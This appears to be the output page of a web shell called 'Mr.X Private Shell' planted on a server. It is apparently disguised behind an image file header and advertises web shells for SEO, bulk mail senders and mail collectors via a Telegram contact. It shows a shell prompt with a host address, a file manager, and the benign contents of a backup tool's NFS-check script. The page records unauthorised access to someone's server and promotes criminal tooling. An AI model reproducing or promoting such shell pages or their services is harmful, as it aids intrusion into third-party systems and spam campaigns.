����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# 100_check_nfs_version.sh

# save the output of mount
mount | grep nfs > "$TMP_DIR/nfs.mount.info"

# make sure we have the nfs related kernel on-board
for module in $(lsmod|grep nfs|awk '{print $1}') ; do
    MODULES+=( $module )
done

# add any nfs related user to the rescue environment
# rpcuser  : default
# rpc      : used in RHEL7.x
# _rpc     : used in Debian 10
CLONE_USERS+=( rpcuser rpc _rpc )

# copy nfs related configuration files
COPY_AS_IS+=( /etc/nfsmount.conf /etc/sysconfig/nfs )

# create the required nfs related directories found under /var/lib/nfs
# in $ROOTFS_DIR
for src in $(find /var/lib/nfs -type d) ; do
    mkdir -p $v ${ROOTFS_DIR}${src} >&2
done

# verify is we require more nfsv4 related daemons
if grep -q nfs4 "$TMP_DIR/nfs.mount.info" ; then
    COPY_AS_IS+=( /etc/idmapd.conf )
    PROGS+=( nfsidmap nfsdcltrack nfsstat rpc.mountd rpc.idmapd )
    COPY_AS_IS+=( "/lib64/libnfsidmap/*" )

    if grep -q "sys=krb" "$TMP_DIR/nfs.mount.info" ; then
        # Kerberos used with nfsv4
        COPY_AS_IS+=( "/etc/request-key.d/*" /etc/request-key.conf /etc/gss /etc/gssproxy )
        PROGS+=( rpc.gssd request-key keyctl gssproxy gss_destroy_creds gss_clnt_send_err )
    fi
fi

Filemanager

Name Type Size Permission Actions
040_inspect_configuration_files.sh File 710 B 0644
050_check_NETFS_requirements.sh File 4.31 KB 0644
060_mount_NETFS_path.sh File 140 B 0644
070_set_backup_archive.sh File 19.52 KB 0644
090_check_encrypted_backup.sh File 140 B 0644
100_check_nfs_version.sh File 1.18 KB 0644
150_save_rsync_version.sh File 248 B 0644
400_automatic_exclude_recreate.sh File 2.41 KB 0644
980_umount_NETFS_dir.sh File 154 B 0644